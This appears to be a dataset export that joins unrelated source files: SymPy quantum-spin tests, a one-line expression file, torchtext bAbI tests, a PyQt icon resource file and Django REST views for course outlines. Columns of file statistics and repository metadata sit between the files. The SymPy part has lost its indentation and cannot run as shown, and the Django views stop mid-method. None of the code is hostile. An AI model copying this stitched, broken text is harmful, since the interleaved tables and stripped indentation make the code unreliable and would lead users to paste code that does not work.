- sqrt(2) * JzKetCoupled(1, 0, (1, 1)) / 2
+ JzKetCoupled(1, 1, (1, 1)) / 2,
]
fun = [state(1, 1, (1, 1)) for state in (JxKetCoupled, JyKetCoupled, JzKetCoupled)]
for state in fun:
got = qapply(Rotation(0, pi / 2, 0) * state)
assert got in ans
ans.remove(got)
assert not ans
arg = Rotation(a, b, g) * fun[0]
assert qapply(arg) == (
-exp(-I * a) * exp(I * g) * cos(b) * JxKetCoupled(1, -1, (1, 1)) / 2
+ exp(-I * a) * exp(I * g) * JxKetCoupled(1, -1, (1, 1)) / 2
- sqrt(2) * exp(-I * a) * sin(b) * JxKetCoupled(1, 0, (1, 1)) / 2
+ exp(-I * a) * exp(-I * g) * cos(b) * JxKetCoupled(1, 1, (1, 1)) / 2
+ exp(-I * a) * exp(-I * g) * JxKetCoupled(1, 1, (1, 1)) / 2
)
# dummy effective
assert str(
qapply(Rotation(a, b, g) * JzKetCoupled(j, m, (j1, j2)), dummy=False)
) == str(
qapply(Rotation(a, b, g) * JzKetCoupled(j, m, (j1, j2)), dummy=True)
).replace(
"_", ""
)
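# The symbolic rotation results above are assembled from Wigner D-matrix
# elements; a minimal standalone sketch (assuming only the public SymPy API
# already used in this file) shows one small-d element evaluating in closed form:
#     from sympy import S, pi
#     from sympy.physics.quantum.spin import Rotation
#     assert Rotation.d(1, 0, 0, pi / 3).doit() == S.Half  # d^1_{0,0}(beta) = cos(beta)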
def test_jzket():
j, m = symbols("j m")
# j not integer or half integer
raises(ValueError, lambda: JzKet(Rational(2, 3), Rational(-1, 3)))
raises(ValueError, lambda: JzKet(Rational(2, 3), m))
# j < 0
raises(ValueError, lambda: JzKet(-1, 1))
raises(ValueError, lambda: JzKet(-1, m))
# m not integer or half integer
raises(ValueError, lambda: JzKet(j, Rational(-1, 3)))
# abs(m) > j
raises(ValueError, lambda: JzKet(1, 2))
raises(ValueError, lambda: JzKet(1, -2))
# j-m not integer
raises(ValueError, lambda: JzKet(1, S.Half))
def test_jzketcoupled():
j, m = symbols("j m")
# j not integer or half integer
raises(ValueError, lambda: JzKetCoupled(Rational(2, 3), Rational(-1, 3), (1,)))
raises(ValueError, lambda: JzKetCoupled(Rational(2, 3), m, (1,)))
# j < 0
raises(ValueError, lambda: JzKetCoupled(-1, 1, (1,)))
raises(ValueError, lambda: JzKetCoupled(-1, m, (1,)))
# m not integer or half integer
raises(ValueError, lambda: JzKetCoupled(j, Rational(-1, 3), (1,)))
# abs(m) > j
raises(ValueError, lambda: JzKetCoupled(1, 2, (1,)))
raises(ValueError, lambda: JzKetCoupled(1, -2, (1,)))
# j-m not integer
raises(ValueError, lambda: JzKetCoupled(1, S.Half, (1,)))
# checks types on coupling scheme
raises(TypeError, lambda: JzKetCoupled(1, 1, 1))
raises(TypeError, lambda: JzKetCoupled(1, 1, (1,), 1))
raises(TypeError, lambda: JzKetCoupled(1, 1, (1, 1), (1,)))
raises(TypeError, lambda: JzKetCoupled(1, 1, (1, 1, 1), (1, 2, 1), (1, 3, 1)))
# checks length of coupling terms
raises(ValueError, lambda: JzKetCoupled(1, 1, (1,), ((1, 2, 1),)))
raises(ValueError, lambda: JzKetCoupled(1, 1, (1, 1), ((1, 2),)))
# all jn are integer or half-integer
raises(ValueError, lambda: JzKetCoupled(1, 1, (Rational(1, 3), Rational(2, 3))))
# indices in coupling scheme must be integers
raises(ValueError, lambda: JzKetCoupled(1, 1, (1, 1), ((S.Half, 1, 2),)))
raises(ValueError, lambda: JzKetCoupled(1, 1, (1, 1), ((1, S.Half, 2),)))
# indices out of range
raises(ValueError, lambda: JzKetCoupled(1, 1, (1, 1), ((0, 2, 1),)))
raises(ValueError, lambda: JzKetCoupled(1, 1, (1, 1), ((3, 2, 1),)))
raises(ValueError, lambda: JzKetCoupled(1, 1, (1, 1), ((1, 0, 1),)))
raises(ValueError, lambda: JzKetCoupled(1, 1, (1, 1), ((1, 3, 1),)))
# all j values in coupling scheme must be integer or half-integer
raises(
ValueError, lambda: JzKetCoupled(1, 1, (1, 1, 1), ((1, 2, S(4) / 3), (1, 3, 1)))
)
# each coupling must satisfy |j1-j2| <= j3 <= j1+j2
raises(ValueError, lambda: JzKetCoupled(1, 1, (1, 5)))
raises(ValueError, lambda: JzKetCoupled(5, 1, (1, 1)))
# final j of coupling must be j of the state
raises(ValueError, lambda: JzKetCoupled(1, 1, (1, 1), ((1, 2, 2),)))
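# A minimal, self-contained sketch of the behaviours exercised above, assuming
# only the public sympy.physics.quantum API (imports spelled out for clarity):
from sympy.physics.quantum.qapply import qapply
from sympy.physics.quantum.constants import hbar
from sympy.physics.quantum.spin import Jz, JzKet, JzKetCoupled
assert qapply(Jz * JzKet(1, 1)) == hbar * JzKet(1, 1)  # Jz eigenvalue is m*hbar
assert qapply(Jz * JzKetCoupled(1, 1, (1, 1))) == hbar * JzKetCoupled(1, 1, (1, 1))
try:
    JzKet(1, 2)  # |m| > j is rejected, as the validation checks above require
except ValueError:
    pass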
| 31.475835
| 88
| 0.400342
| 59,848
| 459,799
| 3.074021
| 0.00269
| 0.165159
| 0.083751
| 0.133171
| 0.986308
| 0.981139
| 0.973507
| 0.964332
| 0.952395
| 0.94265
| 0
| 0.104792
| 0.402385
| 459,799
| 14,607
| 89
| 31.47799
| 0.564733
| 0.007999
| 0
| 0.708008
| 0
| 0
| 0.000886
| 0
| 0
| 0
| 0
| 0
| 0.092006
| 1
| 0.002651
| false
| 0
| 0.000558
| 0
| 0.003209
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
79eacad242585ca8fffc62922749ed2be91cff44
| 41
|
py
|
Python
|
Waveforms/results/hSymmetric_3_2.py
|
keefemitman/PostNewtonian
|
853d6577cb0002da5eebe1cb55f0c28fbc114324
|
[
"MIT"
] | 18
|
2015-03-26T01:04:36.000Z
|
2022-02-01T19:26:21.000Z
|
Waveforms/results/hSymmetric_3_2.py
|
keefemitman/PostNewtonian
|
853d6577cb0002da5eebe1cb55f0c28fbc114324
|
[
"MIT"
] | 4
|
2015-01-08T23:46:29.000Z
|
2017-09-20T19:13:51.000Z
|
Waveforms/results/hSymmetric_3_2.py
|
keefemitman/PostNewtonian
|
853d6577cb0002da5eebe1cb55f0c28fbc114324
|
[
"MIT"
] | 3
|
2016-05-13T02:36:14.000Z
|
2021-11-23T21:36:32.000Z
|
8*sqrt(7)*sqrt(pi)*nu*r(0)**3*v(0)**10/21
| 41
| 41
| 0.560976
| 13
| 41
| 1.769231
| 0.846154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.219512
| 0
| 41
| 1
| 41
| 41
| 0.341463
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cef3ff965d1255bbb59a4f29b2bc258f946b2ba0
| 1,937
|
py
|
Python
|
test/legacy/babi.py
|
parmeet/text
|
1fb2aedb48b5ecc5e81741e7c8504486b91655c6
|
[
"BSD-3-Clause"
] | 1
|
2021-04-16T08:31:30.000Z
|
2021-04-16T08:31:30.000Z
|
test/legacy/babi.py
|
parmeet/text
|
1fb2aedb48b5ecc5e81741e7c8504486b91655c6
|
[
"BSD-3-Clause"
] | 3
|
2021-02-24T22:51:20.000Z
|
2021-03-05T02:38:15.000Z
|
test/legacy/babi.py
|
parmeet/text
|
1fb2aedb48b5ecc5e81741e7c8504486b91655c6
|
[
"BSD-3-Clause"
] | 1
|
2021-06-21T07:13:53.000Z
|
2021-06-21T07:13:53.000Z
|
from torchtext.legacy import datasets
# en-valid
TRAIN_NUM = [0] + [900] * 16 + [904, 905, 900, 904]
VAL_NUM = [0] + [100] * 16 + [96, 95, 100, 96]
TEST_NUM = [0] + [1000] * 20
# Testcase 1 (joint training)
train_iter, val_iter, test_iter = datasets.BABI20.iters(task=1, joint=True)
assert len(train_iter.dataset) == sum(TRAIN_NUM)
assert len(val_iter.dataset) == VAL_NUM[1]
assert len(test_iter.dataset) == TEST_NUM[1]
# Testcase 2 (only supporting)
train_iter, val_iter, test_iter = datasets.BABI20.iters(task=1, only_supporting=True)
assert len(train_iter.dataset) == TRAIN_NUM[2]
assert len(val_iter.dataset) == VAL_NUM[2]
assert len(test_iter.dataset) == TEST_NUM[2]
# Testcase 3 (single task)
for i in range(1, 21):
train_iter, val_iter, test_iter = datasets.BABI20.iters(task=i)
assert len(train_iter.dataset) == TRAIN_NUM[i]
assert len(val_iter.dataset) == VAL_NUM[i]
assert len(test_iter.dataset) == TEST_NUM[i]
# en-valid-10k
TRAIN_NUM = [0] + [9000] * 17 + [8996, 9000, 9002]
VAL_NUM = [0] + [1000] * 17 + [1004, 1000, 998]
TEST_NUM = [0] + [1000] * 20
# Testcase 1 (joint training)
train_iter, val_iter, test_iter = datasets.BABI20.iters(task=1, joint=True, tenK=True)
assert len(train_iter.dataset) == sum(TRAIN_NUM)
assert len(val_iter.dataset) == VAL_NUM[1]
assert len(test_iter.dataset) == TEST_NUM[1]
# Testcase 2 (only supporting)
train_iter, val_iter, test_iter = datasets.BABI20.iters(task=1, only_supporting=True,
tenK=True)
assert len(train_iter.dataset) == TRAIN_NUM[2]
assert len(val_iter.dataset) == VAL_NUM[2]
assert len(test_iter.dataset) == TEST_NUM[2]
# Testcase 3 (single task)
for i in range(1, 21):
train_iter, val_iter, test_iter = datasets.BABI20.iters(task=i, tenK=True)
assert len(train_iter.dataset) == TRAIN_NUM[i]
assert len(val_iter.dataset) == VAL_NUM[i]
assert len(test_iter.dataset) == TEST_NUM[i]
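# The repeated size checks above follow one pattern; a small helper could factor
# them out (a sketch only -- it relies on the same torchtext.legacy BABI20.iters
# API and the *_NUM lists defined above):
def check_split_sizes(train_n, val_n, test_n, **iters_kwargs):
    train_iter, val_iter, test_iter = datasets.BABI20.iters(**iters_kwargs)
    assert len(train_iter.dataset) == train_n
    assert len(val_iter.dataset) == val_n
    assert len(test_iter.dataset) == test_n
# e.g. the single-task 10k check for task 1 would become:
# check_split_sizes(TRAIN_NUM[1], VAL_NUM[1], TEST_NUM[1], task=1, tenK=True)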
| 37.980392
| 86
| 0.691791
| 316
| 1,937
| 4.044304
| 0.164557
| 0.126761
| 0.056338
| 0.075117
| 0.884194
| 0.884194
| 0.884194
| 0.884194
| 0.881064
| 0.871674
| 0
| 0.076355
| 0.16159
| 1,937
| 50
| 87
| 38.74
| 0.710591
| 0.095509
| 0
| 0.647059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.529412
| 1
| 0
| false
| 0
| 0.029412
| 0
| 0.029412
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
063c85f0a1f4f874816ee9302107f906c9a7a7fb
| 6,699
|
py
|
Python
|
buildnotifylib/generated/icons_rc.py
|
rwilsonncsa/buildnotify
|
35a960937c2b77d5c802162a8a83d02640d6e55c
|
[
"MIT"
] | null | null | null |
buildnotifylib/generated/icons_rc.py
|
rwilsonncsa/buildnotify
|
35a960937c2b77d5c802162a8a83d02640d6e55c
|
[
"MIT"
] | null | null | null |
buildnotifylib/generated/icons_rc.py
|
rwilsonncsa/buildnotify
|
35a960937c2b77d5c802162a8a83d02640d6e55c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Resource object code
#
# Created: Tue Mar 18 20:49:08 2014
# by: The Resource Compiler for PyQt (Qt v4.8.2)
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore
qt_resource_data = "\
\x00\x00\x00\xcd\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\
\x31\x2e\x31\x22\x3e\x0a\x20\x20\x3c\x72\x65\x63\x74\x20\x78\x3d\
\x22\x30\x22\x20\x79\x3d\x22\x30\x22\x20\x72\x78\x3d\x22\x31\x35\
\x30\x22\x20\x72\x79\x3d\x22\x31\x35\x30\x22\x20\x77\x69\x64\x74\
\x68\x3d\x22\x37\x34\x34\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\
\x37\x34\x34\x22\x0a\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\
\x6c\x6c\x3a\x72\x67\x62\x28\x31\x34\x36\x2c\x32\x30\x38\x2c\x38\
\x30\x29\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x62\x6c\x61\x63\x6b\x3b\
\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x35\x3b\x73\
\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\
\x35\x22\x2f\x3e\x0a\x3c\x2f\x73\x76\x67\x3e\x0a\
\x00\x00\x00\xcd\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\
\x31\x2e\x31\x22\x3e\x0a\x20\x20\x3c\x72\x65\x63\x74\x20\x78\x3d\
\x22\x30\x22\x20\x79\x3d\x22\x30\x22\x20\x72\x78\x3d\x22\x31\x35\
\x30\x22\x20\x72\x79\x3d\x22\x31\x35\x30\x22\x20\x77\x69\x64\x74\
\x68\x3d\x22\x37\x34\x34\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\
\x37\x34\x34\x22\x0a\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\
\x6c\x6c\x3a\x72\x67\x62\x28\x31\x34\x36\x2c\x32\x30\x38\x2c\x38\
\x30\x29\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x62\x6c\x61\x63\x6b\x3b\
\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x35\x3b\x73\
\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\
\x35\x22\x2f\x3e\x0a\x3c\x2f\x73\x76\x67\x3e\x0a\
\x00\x00\x00\xce\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\
\x31\x2e\x31\x22\x3e\x0a\x20\x20\x3c\x72\x65\x63\x74\x20\x78\x3d\
\x22\x30\x22\x20\x79\x3d\x22\x30\x22\x20\x72\x78\x3d\x22\x31\x35\
\x30\x22\x20\x72\x79\x3d\x22\x31\x35\x30\x22\x20\x77\x69\x64\x74\
\x68\x3d\x22\x37\x34\x34\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\
\x37\x34\x34\x22\x0a\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\
\x6c\x6c\x3a\x72\x67\x62\x28\x31\x30\x32\x2c\x31\x30\x32\x2c\x31\
\x30\x32\x29\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x62\x6c\x61\x63\x6b\
\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x35\x3b\
\x73\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\
\x2e\x35\x22\x2f\x3e\x0a\x3c\x2f\x73\x76\x67\x3e\x0a\
\x00\x00\x00\xcc\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\
\x31\x2e\x31\x22\x3e\x0a\x20\x20\x3c\x72\x65\x63\x74\x20\x78\x3d\
\x22\x30\x22\x20\x79\x3d\x22\x30\x22\x20\x72\x78\x3d\x22\x31\x35\
\x30\x22\x20\x72\x79\x3d\x22\x31\x35\x30\x22\x20\x77\x69\x64\x74\
\x68\x3d\x22\x37\x34\x34\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\
\x37\x34\x34\x22\x0a\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\
\x6c\x6c\x3a\x72\x67\x62\x28\x32\x35\x35\x2c\x31\x35\x33\x2c\x30\
\x29\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x62\x6c\x61\x63\x6b\x3b\x73\
\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x35\x3b\x73\x74\
\x72\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\x35\
\x22\x2f\x3e\x0a\x3c\x2f\x73\x76\x67\x3e\x0a\
\x00\x00\x00\xc1\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\
\x31\x2e\x31\x22\x3e\x0a\x20\x20\x3c\x72\x65\x63\x74\x20\x78\x3d\
\x22\x30\x22\x20\x79\x3d\x22\x30\x22\x20\x72\x78\x3d\x22\x31\x35\
\x30\x22\x20\x72\x79\x3d\x22\x31\x35\x30\x22\x20\x77\x69\x64\x74\
\x68\x3d\x22\x37\x34\x34\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\
\x37\x34\x34\x22\x0a\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\
\x6c\x6c\x3a\x72\x65\x64\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x62\x6c\
\x61\x63\x6b\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3a\x35\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\x74\
\x79\x3a\x30\x2e\x35\x22\x2f\x3e\x0a\x3c\x2f\x73\x76\x67\x3e\x0a\
\
"
qt_resource_name = "\
\x00\x06\
\x07\xaa\x8b\xc3\
\x00\x73\
\x00\x74\x00\x61\x00\x74\x00\x75\x00\x73\
\x00\x05\
\x00\x6f\xa6\x53\
\x00\x69\
\x00\x63\x00\x6f\x00\x6e\x00\x73\
\x00\x17\
\x02\x27\x97\xc7\
\x00\x62\
\x00\x75\x00\x69\x00\x6c\x00\x64\x00\x6e\x00\x6f\x00\x74\x00\x69\x00\x66\x00\x79\x00\x2d\x00\x73\x00\x75\x00\x63\x00\x63\x00\x65\
\x00\x73\x00\x73\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x20\
\x02\xe1\xd6\x67\
\x00\x62\
\x00\x75\x00\x69\x00\x6c\x00\x64\x00\x6e\x00\x6f\x00\x74\x00\x69\x00\x66\x00\x79\x00\x2d\x00\x73\x00\x75\x00\x63\x00\x63\x00\x65\
\x00\x73\x00\x73\x00\x2d\x00\x62\x00\x75\x00\x69\x00\x6c\x00\x64\x00\x69\x00\x6e\x00\x67\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x18\
\x06\x07\x4c\x67\
\x00\x62\
\x00\x75\x00\x69\x00\x6c\x00\x64\x00\x6e\x00\x6f\x00\x74\x00\x69\x00\x66\x00\x79\x00\x2d\x00\x69\x00\x6e\x00\x61\x00\x63\x00\x74\
\x00\x69\x00\x76\x00\x65\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x20\
\x03\xb9\xe4\x87\
\x00\x62\
\x00\x75\x00\x69\x00\x6c\x00\x64\x00\x6e\x00\x6f\x00\x74\x00\x69\x00\x66\x00\x79\x00\x2d\x00\x66\x00\x61\x00\x69\x00\x6c\x00\x75\
\x00\x72\x00\x65\x00\x2d\x00\x62\x00\x75\x00\x69\x00\x6c\x00\x64\x00\x69\x00\x6e\x00\x67\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x17\
\x02\xec\x1c\x87\
\x00\x62\
\x00\x75\x00\x69\x00\x6c\x00\x64\x00\x6e\x00\x6f\x00\x74\x00\x69\x00\x66\x00\x79\x00\x2d\x00\x66\x00\x61\x00\x69\x00\x6c\x00\x75\
\x00\x72\x00\x65\x00\x2e\x00\x73\x00\x76\x00\x67\
"
qt_resource_struct = "\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x12\x00\x02\x00\x00\x00\x05\x00\x00\x00\x03\
\x00\x00\x00\x22\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x00\x56\x00\x00\x00\x00\x00\x01\x00\x00\x00\xd1\
\x00\x00\x01\x18\x00\x00\x00\x00\x00\x01\x00\x00\x03\x44\
\x00\x00\x00\xd2\x00\x00\x00\x00\x00\x01\x00\x00\x02\x74\
\x00\x00\x00\x9c\x00\x00\x00\x00\x00\x01\x00\x00\x01\xa2\
"
def qInitResources():
QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
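# Usage sketch: importing this generated module registers the embedded SVG data
# with Qt's resource system (qInitResources() runs at import time); icons are
# then loaded by resource path.  The exact ":/..." prefix depends on the .qrc
# file this was compiled from, so the path below is illustrative only:
#     from PyQt4 import QtGui
#     from buildnotifylib.generated import icons_rc  # noqa: F401
#     icon = QtGui.QIcon(":/status/icons/buildnotify-success.svg")  # hypothetical path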
| 46.520833
| 129
| 0.723242
| 1,553
| 6,699
| 3.108178
| 0.081777
| 0.087011
| 0.07831
| 0.044748
| 0.875078
| 0.866377
| 0.865134
| 0.856433
| 0.841516
| 0.828465
| 0
| 0.403387
| 0.030452
| 6,699
| 143
| 130
| 46.846154
| 0.3398
| 0.027019
| 0
| 0.546875
| 0
| 0.648438
| 0
| 0
| 0
| 1
| 0.001229
| 0
| 0
| 1
| 0.015625
| false
| 0
| 0.007813
| 0
| 0.023438
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
065370ad3a1ca4e10e67a9cbad43334d8a237551
| 27,824
|
py
|
Python
|
CourseOutlineBackend/courseoutline/views.py
|
stancsz/web-development-project-ensf-607
|
03b11df4971afd4f27fee54a1800a40d4cc10240
|
[
"Apache-2.0"
] | null | null | null |
CourseOutlineBackend/courseoutline/views.py
|
stancsz/web-development-project-ensf-607
|
03b11df4971afd4f27fee54a1800a40d4cc10240
|
[
"Apache-2.0"
] | null | null | null |
CourseOutlineBackend/courseoutline/views.py
|
stancsz/web-development-project-ensf-607
|
03b11df4971afd4f27fee54a1800a40d4cc10240
|
[
"Apache-2.0"
] | null | null | null |
from django.shortcuts import render
# Create your views here.
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.mixins import UpdateModelMixin, DestroyModelMixin
from .models import *
from .serializers import *
class CoordinatorPostGetView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def get(self, request, CourseID=None):
if CourseID:
try:
queryset = Coordinator.objects.filter(CourseID=CourseID)
except Coordinator.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
read_serializer = CoordinatorSerializer(queryset, many=True)
else:
queryset = Coordinator.objects.all()
read_serializer = CoordinatorSerializer(queryset, many=True)
return Response(read_serializer.data)
def post(self, request):
create_serializer = CoordinatorSerializer(data=request.data)
if create_serializer.is_valid():
item_object = create_serializer.save()
read_serializer = CoordinatorSerializer(item_object)
return Response(read_serializer.data, status=201)
return Response(create_serializer.errors, status=400)
class CoordinatorPutDelView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def put(self, request, ModelID=None):
try:
item = Coordinator.objects.get(ModelID=ModelID)
except Coordinator.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
update_serializer = CoordinatorSerializer(item, data=request.data)
if update_serializer.is_valid():
item_object = update_serializer.save()
read_serializer = CoordinatorSerializer(item_object)
return Response(read_serializer.data, status=200)
return Response(update_serializer.errors, status=400)
def delete(self, request, ModelID=None):
try:
item = Coordinator.objects.get(ModelID=ModelID)
except Coordinator.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
item.delete()
return Response(status=204)
class InfoPostGetView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def get(self, request, CourseID=None):
if CourseID:
try:
queryset = Info.objects.filter(CourseID=CourseID)
except Info.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
read_serializer = InfoSerializer(queryset, many=True)
else:
queryset = Info.objects.all()
read_serializer = InfoSerializer(queryset, many=True)
return Response(read_serializer.data)
def post(self, request):
create_serializer = InfoSerializer(data=request.data)
if create_serializer.is_valid():
item_object = create_serializer.save()
read_serializer = InfoSerializer(item_object)
return Response(read_serializer.data, status=201)
return Response(create_serializer.errors, status=400)
class InfoPutDelView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def put(self, request, ModelID=None):
try:
item = Info.objects.get(ModelID=ModelID)
except Info.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
update_serializer = InfoSerializer(item, data=request.data)
if update_serializer.is_valid():
item_object = update_serializer.save()
read_serializer = InfoSerializer(item_object)
return Response(read_serializer.data, status=200)
return Response(update_serializer.errors, status=400)
def delete(self, request, ModelID=None):
try:
item = Info.objects.get(ModelID=ModelID)
except Info.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
item.delete()
return Response(status=204)
class GradeDeterminationPostGetView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def get(self, request, CourseID=None):
if CourseID:
try:
queryset = GradeDetermination.objects.filter(CourseID=CourseID)
except GradeDetermination.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
read_serializer = GradeDeterminationSerializer(queryset, many=True)
else:
queryset = GradeDetermination.objects.all()
read_serializer = GradeDeterminationSerializer(queryset, many=True)
return Response(read_serializer.data)
def post(self, request):
create_serializer = GradeDeterminationSerializer(data=request.data)
if create_serializer.is_valid():
item_object = create_serializer.save()
read_serializer = GradeDeterminationSerializer(item_object)
return Response(read_serializer.data, status=201)
return Response(create_serializer.errors, status=400)
class GradeDeterminationPutDelView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def put(self, request, ModelID=None):
try:
item = GradeDetermination.objects.get(ModelID=ModelID)
except GradeDetermination.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
update_serializer = GradeDeterminationSerializer(item, data=request.data)
if update_serializer.is_valid():
item_object = update_serializer.save()
read_serializer = GradeDeterminationSerializer(item_object)
return Response(read_serializer.data, status=200)
return Response(update_serializer.errors, status=400)
def delete(self, request, ModelID=None):
try:
item = GradeDetermination.objects.get(ModelID=ModelID)
except GradeDetermination.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
item.delete()
return Response(status=204)
class OutcomePostGetView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def get(self, request, CourseID=None):
if CourseID:
try:
queryset = Outcome.objects.filter(CourseID=CourseID)
except Outcome.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
read_serializer = OutcomeSerializer(queryset, many=True)
else:
queryset = Outcome.objects.all()
read_serializer = OutcomeSerializer(queryset, many=True)
return Response(read_serializer.data)
def post(self, request):
create_serializer = OutcomeSerializer(data=request.data)
if create_serializer.is_valid():
item_object = create_serializer.save()
read_serializer = OutcomeSerializer(item_object)
return Response(read_serializer.data, status=201)
return Response(create_serializer.errors, status=400)
class OutcomePutDelView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def put(self, request, ModelID=None):
try:
item = Outcome.objects.get(ModelID=ModelID)
except Outcome.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
update_serializer = OutcomeSerializer(item, data=request.data)
if update_serializer.is_valid():
item_object = update_serializer.save()
read_serializer = OutcomeSerializer(item_object)
return Response(read_serializer.data, status=200)
return Response(update_serializer.errors, status=400)
def delete(self, request, ModelID=None):
try:
item = Outcome.objects.get(ModelID=ModelID)
